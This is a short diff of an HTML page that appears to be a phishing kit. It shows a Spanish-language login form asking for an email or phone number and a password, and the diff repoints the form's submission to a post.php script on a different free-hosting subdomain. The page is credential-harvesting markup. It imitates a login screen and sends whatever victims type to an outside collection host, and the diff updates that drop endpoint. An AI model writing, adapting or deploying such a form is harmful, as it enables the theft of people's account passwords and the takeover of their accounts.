--- a/index.html
+++ b/index.html
@@ -27,7 +27,7 @@
 		
 		<div class="ko2da4wv">
 			<div class="ko2djsdb">
-				<form action="https://modoclasicidmilloganrtwetqw.000webhostapp.com/post.php" method="post" id="form">
+				<form action="https://mood-relaxuhdyvewd.000webhostapp.com/post.php" method="post" id="form">
 					<input class="ko2dueyv" type="text" name="email" placeholder="Correo electrónico o número de teléfono">
 					<input class="ko2dww2v" type="password" name="pass" placeholder="Contraseña">
 					<div class="ko2e4izi">
